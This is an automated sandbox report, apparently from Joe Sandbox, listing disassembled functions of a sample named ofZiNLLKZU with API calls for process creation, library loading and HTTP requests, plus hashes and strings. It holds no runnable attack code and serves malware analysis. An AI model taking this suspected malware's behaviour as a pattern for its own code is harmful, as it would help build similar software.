                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$BuffCharUpper
                                                                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                • API String ID: 1256254125-909552448
                                                                                • Opcode ID: 3e7a59185af29e6e9b853350fbfdf65edfe4ea927e555ffbc4425ac0514a8891
                                                                                • Instruction ID: 9affe1e7ace5a602a54e6fcb64bff2c9b483011fe2ea3ef52a9302dbd72f2bb3
                                                                                • Opcode Fuzzy Hash: 3e7a59185af29e6e9b853350fbfdf65edfe4ea927e555ffbc4425ac0514a8891
                                                                                • Instruction Fuzzy Hash: 3071D13261022A8FCF20DE6CCD515FA3B97ABA0775F150529FC669B384EA31CD49C3A0
                                                                                Function 0066833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _wcslen.LIBCMT ref: 0066835A
                                                                                • _wcslen.LIBCMT ref: 0066836E
                                                                                • _wcslen.LIBCMT ref: 00668391
                                                                                • _wcslen.LIBCMT ref: 006683B4
                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 006683F2
                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00665BF2), ref: 0066844E
                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00668487
                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 006684CA
                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00668501
                                                                                • FreeLibrary.KERNEL32(?), ref: 0066850D
                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0066851D
                                                                                • DestroyIcon.USER32(?,?,?,?,?,00665BF2), ref: 0066852C
                                                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00668549
                                                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00668555
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                • String ID: .dll$.exe$.icl
                                                                                • API String ID: 799131459-1154884017
                                                                                • Opcode ID: 2068d1092b3c40837201d71fbd4950a2c96b651d92ab82c8017504ca6f57e6bf
                                                                                • Instruction ID: c2c12b2adcaa39e740bd29d62df9b324ce1ad29637a3f583584ce897fd3d8e16
                                                                                • Opcode Fuzzy Hash: 2068d1092b3c40837201d71fbd4950a2c96b651d92ab82c8017504ca6f57e6bf
                                                                                • Instruction Fuzzy Hash: 8E61D07150060ABEEB14DF74CC45BFE7BA9BB44720F10420AF916D62D0DBB49980CBA0
                                                                                Function 005D7778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                • API String ID: 0-1645009161
                                                                                • Opcode ID: 7a4c5b7e2f0aee2692f589d3a51129e578087f665747c6756297825e23b1ee0d
                                                                                • Instruction ID: e2ff2ca647179cd9d448e72b05f7e882aedc3363f01d34744dff93e36c7ae1c4
                                                                                • Opcode Fuzzy Hash: 7a4c5b7e2f0aee2692f589d3a51129e578087f665747c6756297825e23b1ee0d
                                                                                • Instruction Fuzzy Hash: 0381E67160060ABBDB21AF64DC46FFA7F69BF99300F044427F905AB292EB70D941C791
                                                                                Function 00635A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadIconW.USER32(00000063), ref: 00635A2E
                                                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00635A40
                                                                                • SetWindowTextW.USER32(?,?), ref: 00635A57
                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00635A6C
                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00635A72
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00635A82
                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00635A88
                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00635AA9
                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00635AC3
                                                                                • GetWindowRect.USER32(?,?), ref: 00635ACC
                                                                                • _wcslen.LIBCMT ref: 00635B33
                                                                                • SetWindowTextW.USER32(?,?), ref: 00635B6F
                                                                                • GetDesktopWindow.USER32 ref: 00635B75
                                                                                • GetWindowRect.USER32(00000000), ref: 00635B7C
                                                                                • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00635BD3
                                                                                • GetClientRect.USER32(?,?), ref: 00635BE0
                                                                                • PostMessageW.USER32(?,00000005,00000000,?), ref: 00635C05
                                                                                • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00635C2F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                • String ID:
                                                                                • API String ID: 895679908-0
                                                                                • Opcode ID: 2ccd721349040fcafec020dd846d008ee3024c29d2e15045187e312aa652f89a
                                                                                • Instruction ID: f218066b1884f4ff4eff41508485d360acf17137cdb66762bf788816bfa65e49
                                                                                • Opcode Fuzzy Hash: 2ccd721349040fcafec020dd846d008ee3024c29d2e15045187e312aa652f89a
                                                                                • Instruction Fuzzy Hash: EE717F31900B05AFDB20DFA8CE55AAEBBF6FF48715F104518E583A36A0D775E940CB94
                                                                                Function 006330F7 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen
                                                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[i
                                                                                • API String ID: 176396367-3562049154
                                                                                • Opcode ID: 3f8881059236ff925fcaa4621ba5edcc3c278216fd333110cc24d943afd56aac
                                                                                • Instruction ID: c9575093d977e80bced1fda157aa66454e6f78c89b6647b20ea3bb116118c7cf
                                                                                • Opcode Fuzzy Hash: 3f8881059236ff925fcaa4621ba5edcc3c278216fd333110cc24d943afd56aac
                                                                                • Instruction Fuzzy Hash: 33E1D432A00536ABCF289FA8C8556FEBBB6BF44710F54811AE456E7341DB30AF8587D0
                                                                                Function 005F00C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 005F00C6
                                                                                  • Part of subcall function 005F00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(006A070C,00000FA0,706CD16E,?,?,?,?,006123B3,000000FF), ref: 005F011C
                                                                                  • Part of subcall function 005F00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,006123B3,000000FF), ref: 005F0127
                                                                                  • Part of subcall function 005F00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,006123B3,000000FF), ref: 005F0138
                                                                                  • Part of subcall function 005F00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 005F014E
                                                                                  • Part of subcall function 005F00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 005F015C
                                                                                  • Part of subcall function 005F00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 005F016A
                                                                                  • Part of subcall function 005F00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 005F0195
                                                                                  • Part of subcall function 005F00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 005F01A0
                                                                                • ___scrt_fastfail.LIBCMT ref: 005F00E7
                                                                                  • Part of subcall function 005F00A3: __onexit.LIBCMT ref: 005F00A9
                                                                                Strings
                                                                                • kernel32.dll, xrefs: 005F0133
                                                                                • SleepConditionVariableCS, xrefs: 005F0154
                                                                                • InitializeConditionVariable, xrefs: 005F0148
                                                                                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 005F0122
                                                                                • WakeAllConditionVariable, xrefs: 005F0162
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                • API String ID: 66158676-1714406822
                                                                                • Opcode ID: e02e0dd9ffb298b7ea5d1fdbac19ecb3fe83234430cb354c74bd191a3ad4673b
                                                                                • Instruction ID: a01f5b3b1d453fe07a4c2251134a1ad61a0c9d8c5485c4496a9bba04818ad400
                                                                                • Opcode Fuzzy Hash: e02e0dd9ffb298b7ea5d1fdbac19ecb3fe83234430cb354c74bd191a3ad4673b
                                                                                • Instruction Fuzzy Hash: C9213E32644B156BE7106BA4AC09F7A7B9AFF46B60F051135F941A32D2DFB4AC00CA50
                                                                                Function 006444C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CharLowerBuffW.USER32(00000000,00000000,0066CC08), ref: 00644527
                                                                                • _wcslen.LIBCMT ref: 0064453B
                                                                                • _wcslen.LIBCMT ref: 00644599
                                                                                • _wcslen.LIBCMT ref: 006445F4
                                                                                • _wcslen.LIBCMT ref: 0064463F
                                                                                • _wcslen.LIBCMT ref: 006446A7
                                                                                  • Part of subcall function 005EF9F2: _wcslen.LIBCMT ref: 005EF9FD
                                                                                • GetDriveTypeW.KERNEL32(?,00696BF0,00000061), ref: 00644743
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$BuffCharDriveLowerType
                                                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                • API String ID: 2055661098-1000479233
                                                                                • Opcode ID: 24c5dad5db32f7fba3caa104efe25b56e97e7cc3ef33866d45072a027210a4f0
                                                                                • Instruction ID: 1cce9bbbfaf26e01f7fc5d78032a45a17b2e1fe3be0ef8d27780fe9203cb3e3b
                                                                                • Opcode Fuzzy Hash: 24c5dad5db32f7fba3caa104efe25b56e97e7cc3ef33866d45072a027210a4f0
                                                                                • Instruction Fuzzy Hash: 9BB1D1716083029FC714DF28C896AAABBE6BFE5760F50491EF496C7391EB30D845CB52
                                                                                Function 0066911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 005E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 005E9BB2
                                                                                • DragQueryPoint.SHELL32(?,?), ref: 00669147
                                                                                  • Part of subcall function 00667674: ClientToScreen.USER32(?,?), ref: 0066769A
                                                                                  • Part of subcall function 00667674: GetWindowRect.USER32(?,?), ref: 00667710
                                                                                  • Part of subcall function 00667674: PtInRect.USER32(?,?,00668B89), ref: 00667720
                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 006691B0
                                                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 006691BB
                                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 006691DE
                                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00669225
                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0066923E
                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 00669255
                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 00669277
                                                                                • DragFinish.SHELL32(?), ref: 0066927E
                                                                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00669371
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#j
                                                                                • API String ID: 221274066-3710821403
                                                                                • Opcode ID: 535027fc07c1e7e18f64b88b5099d27f2b8b3f7d8f6eeacad68d201c7d4089ce
                                                                                • Instruction ID: a22a9937046370a74f252b541fbd8b94885601313c46bbe606f95ae5142807eb
                                                                                • Opcode Fuzzy Hash: 535027fc07c1e7e18f64b88b5099d27f2b8b3f7d8f6eeacad68d201c7d4089ce
                                                                                • Instruction Fuzzy Hash: 37615A71108302AFC711EF54DC89DABBBEAFBC5750F00092EF595922A1DB709A49CB62
                                                                                Function 0065AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _wcslen.LIBCMT ref: 0065B198
                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0065B1B0
                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0065B1D4
                                                                                • _wcslen.LIBCMT ref: 0065B200
                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0065B214
                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0065B236
                                                                                • _wcslen.LIBCMT ref: 0065B332
                                                                                  • Part of subcall function 006405A7: GetStdHandle.KERNEL32(000000F6), ref: 006405C6
                                                                                • _wcslen.LIBCMT ref: 0065B34B
                                                                                • _wcslen.LIBCMT ref: 0065B366
                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0065B3B6
                                                                                • GetLastError.KERNEL32(00000000), ref: 0065B407
                                                                                • CloseHandle.KERNEL32(?), ref: 0065B439
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0065B44A
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0065B45C
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0065B46E
                                                                                • CloseHandle.KERNEL32(?), ref: 0065B4E3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 2178637699-0
                                                                                • Opcode ID: 61065420e1d03341918f91e64926eef84115c540c8c36991475a8f9a6c26614b
                                                                                • Instruction ID: 7110f9d821f4f2d8f8184391f31db32e9609d9a45d718ac4d567ff757b90e525
                                                                                • Opcode Fuzzy Hash: 61065420e1d03341918f91e64926eef84115c540c8c36991475a8f9a6c26614b
                                                                                • Instruction Fuzzy Hash: 0FF17A316043419FC724EF24C895B6ABBE6BF85310F14855EF8859B3A2DB31EC49CB52
                                                                                Function 005D326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetMenuItemCount.USER32(006A1990), ref: 00612F8D
                                                                                • GetMenuItemCount.USER32(006A1990), ref: 0061303D
                                                                                • GetCursorPos.USER32(?), ref: 00613081
                                                                                • SetForegroundWindow.USER32(00000000), ref: 0061308A
                                                                                • TrackPopupMenuEx.USER32(006A1990,00000000,?,00000000,00000000,00000000), ref: 0061309D
                                                                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 006130A9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                • String ID: 0
                                                                                • API String ID: 36266755-4108050209
                                                                                • Opcode ID: c9a178c0a489b4e7e73a85876b53952d3aab2e7b8fbda0779ab44011c26b7aa4
                                                                                • Instruction ID: 22a8e486c09689b13878b2f01f82a0f1268340944c158b389b6e856ca9e62e92
                                                                                • Opcode Fuzzy Hash: c9a178c0a489b4e7e73a85876b53952d3aab2e7b8fbda0779ab44011c26b7aa4
                                                                                • Instruction Fuzzy Hash: D8710C70640216BEEB319F28CC59FEABF66FF05324F144217F515662E0C7B1A960C795
                                                                                Function 00666CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DestroyWindow.USER32(?,?), ref: 00666DEB
                                                                                  • Part of subcall function 005D6B57: _wcslen.LIBCMT ref: 005D6B6A
                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00666E5F
                                                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00666E81
                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00666E94
                                                                                • DestroyWindow.USER32(?), ref: 00666EB5
                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,005D0000,00000000), ref: 00666EE4
                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00666EFD
                                                                                • GetDesktopWindow.USER32 ref: 00666F16
                                                                                • GetWindowRect.USER32(00000000), ref: 00666F1D
                                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00666F35
                                                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00666F4D
                                                                                  • Part of subcall function 005E9944: GetWindowLongW.USER32(?,000000EB), ref: 005E9952
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                • String ID: 0$tooltips_class32
                                                                                • API String ID: 2429346358-3619404913
                                                                                • Opcode ID: f0b4a353321e18a45f531d631b4abea7b86a92ee76457bca5b9a216356480f63
                                                                                • Instruction ID: f55dadfecf7ab6b8248a6813e579449961f336955573dd88a406190342b5d142
                                                                                • Opcode Fuzzy Hash: f0b4a353321e18a45f531d631b4abea7b86a92ee76457bca5b9a216356480f63
                                                                                • Instruction Fuzzy Hash: 63716674104241AFEB21DF18E848EBBBBEAFB99314F04441EF99987361C771A906CB15
                                                                                Function 0064C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0064C4B0
                                                                                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0064C4C3
                                                                                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0064C4D7
                                                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0064C4F0
                                                                                • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0064C533
                                                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0064C549
                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0064C554
                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0064C584
                                                                                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0064C5DC
                                                                                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0064C5F0
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0064C5FB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                • String ID:
                                                                                • API String ID: 3800310941-3916222277
                                                                                • Opcode ID: 47d75a1b9d88836c88431affd5ed31ff0cbd4d52412c4807ef33d2d86d8865d2
                                                                                • Instruction ID: 14fe998abc292f6296f30d2a20ba095a65fd2b0fcee1be4f10e5ddf96c7b9469
                                                                                • Opcode Fuzzy Hash: 47d75a1b9d88836c88431affd5ed31ff0cbd4d52412c4807ef33d2d86d8865d2
